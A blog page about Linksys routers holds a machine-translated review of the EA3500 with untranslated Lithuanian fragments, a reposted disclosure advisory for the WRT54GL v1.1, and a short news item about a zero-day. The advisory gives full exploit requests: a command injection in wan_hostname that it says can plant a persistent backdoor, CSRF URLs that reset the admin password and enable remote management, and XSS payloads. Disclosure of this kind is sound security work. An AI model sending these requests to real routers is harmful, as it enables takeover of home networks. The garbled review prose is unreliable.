Showing posts with label Linksys. Show all posts
Showing posts with label Linksys. Show all posts

Jan 30, 2013

Linksys EA3500 N750 Dual Band Giga Router


Ominous sounds of the full name of the object, but let us call it simply EA3500 Linksys router. With two-channel Wi-Fi, 1 Gbps LAN, USB support, and compatibility with Android phones planšetėmis.


I loved the minimalist, solid design of the device. Most importantly, no nonsense: antenėlių wobbling and flashing lights ...


Just a nice and simple box. Unfortunately, without being able to hang under the table or on the wall. Perhaps the producers specifically wanted this box would hold only on a desk or computer. Fortunately, there is nothing in the uncorrected one green paperclip.


All detectors are hidden in the tangles. It seems so much more professional and is much easier to use, because once you see that cables and connections are secure.


Anything with a Linksys EA3500 is extremely simplified. Couple step installation instructions are probably understood even orangutans.


If you lose this disk, a small problem, because for the first time just opening a web browser, you'll find exactly the same. I think Linksys really completely taken care of everything that everyone be able to connect the new router to create a home network and connect to it himself.


Cisco Connect gadget allows effortless control of key router functions: view and manage connected computers, to change the wireless network passwords and manage connected USB drive / flash drive, set limits for children or parents to restrict internet traffic. (:


Exactly the same features can be achieved even from your mobile phone or tablets with Cisco Express for iPhone / Android gadget.


Of course, there are the standard web user interface professionals to its already įpratusiems or just want to achieve all the detailed settings. Recent lacking such.: Can block specific sites for a specific computer on the Internet to activate only a specified period of time, limit Internet traffic.



Moreover, the Linksys EA3500 is a dual-band router'is. What do you imagine as two router in one box. So you can simultaneously use two computers connected to WiFi, which does not preclude one another. Or you can to one Wi-Fi channel to connect the game console to send and leave the games, while the other channel connection to your computer and remain free browsing speed.


Linksys has yet exceptionally high-quality Wi-Fi network . All home laptop and the phone displays the maximum signal strength 5/5 divisions. In comparison with previously used in the TP-Link WR1043ND WiFi connection in the kitchen still was not ...


WiFi connection depends not only on the router, but also used a computer or phone, in addition to existing wireless networks. On average, my Toshiba R630 laptop, game console wireless connection to one channel of 35-40Mbps speed. Using a high quality WiFi N network card or USB adapter, you can achieve a maximum speed of 80mbps and 70mbps in both 2.4GHz and 5GHz channels.


Linksys cable EA3500 can develop high as 220 Mbps speed. Most importantly, the reach not only continue, but in practice such.: Sending a torrent's. Even I liked that router'is become stuck, do not break even over a long period of use, so it does not need constant perkrovinėti.


Supports 1Gbps network, so the computer can send data cable impressive 110MB / s (~ 880Mbps) speeds. This, like copying files on the local disk. Within minutes you can transfer the entire 7GB movie.


Even the Linksys EA3500 can connect a USB drive or flash memory, you will be able to achieve as a network drive, stream'inti video. Or even make a home FTP server, accessible via the Internet. The only problem is relatively limited USB 2.0 speeds of up to 27MB / s (~ 210 Mbps).


I had to try a number of routers. So far the favorite Linksys WRT160NL , but the emergence of Gigabit router'iams, it changed the TP-Link WR1043ND. Only then I realized how old Linksys was better because it just worked, and D-Link jam lūždavo, lost wireless connection ... Fortunately, for the month using the new Linksys EA3500, which is easy to forget, because he just always does the job and does not problems. Wi-Fi in all five divisions of the house five torrent downloading at maximum speed, sticking and fractures have remained only TPLINK memories.

There are also gigabit network that files between computers allows you to copy an instant. Liked the two-channel Wi-Fi, with one channel connected a game console, it sends games, and you can navigate to the peaceful second channel with a laptop comp. Even more, this should appeal to those who often share with others online. Like the parents who want to limit Internet time or achievement of some sites. Especially when doing so as the entire router to start using is very simple. So far, 220 Mbps is probably enough existing Internet plans for the future with the DD-WRT firmware and 800Mhz processor, 64 MB of RAM should be easy for the rate increase 2-3 times.

I found only a couple of drawbacks: router'is not adapted for hanging on the wall (the one just resolved a paper clip to help), the standard firmware from Cisco router'io On užsikrauna only in ~ 40s. Maybe the second problem a little funny, because today's Windows 8 PC užsikrauna within five seconds, and then another half a minute to wait for the Internet ...

Jan 21, 2013

Linksys WRT54GL 1.1 XSS OS Injection


Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco

============ Vulnerable Firmware Releases: ============

Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============

The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

============ Shodan Torks ============

Shodan Search: WRT54GL
=> Results 27190 devices

============ Vulnerability Overview: ============

* OS Command Injection
=> parameter: wan_hostname
=> command: `%20ping%20192%2e168%2e178%2e101%20`

The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close

submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> Change the request method from HTTP Post to HTTP GET makes the exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> This setting is placed permanent into the configuration and so it gets executed on every bootup process of the device.

* For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.


POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

http:///apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* reflected XSS

=> parameter: submit_button

Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0

* stored XSS (Access Restrictions -> Richtliniennamen eingeben (place the XSS) -> Zusammenfassung (Scriptcode gets executed)

=> parameter: f_name

Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

=> Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:


http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123">&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=

============ Solution ============

Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013

Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and give them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Send the Beta Agreement back
29.10.2012 - Linksys gives access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================



Jan 19, 2013

Linksys routers vulnerable to zero-day exploit

A zero-day vulnerability has been discovered in popular Cisco Linksys routers that allows hackers to gain remote root access. Security vendor DefenseCode discovered the flaw and reported it to Cisco months ago and a fix is already on the way.


According to Cisco, more than 70 million Linksys routers sold globally. This exploit was successfully tested against a Linksys model WRT54GL router by researchers at security firm DefenseCode who claimed that the latest Linksys firmware 4.30.14 and all previous versions are still vulnerable.

It took the team only 12 days to develop an exploit that could be used by hackers to take control of a person’s wireless router and hijack all the information being processed through it.

The vulnerability is demonstrated in the following video: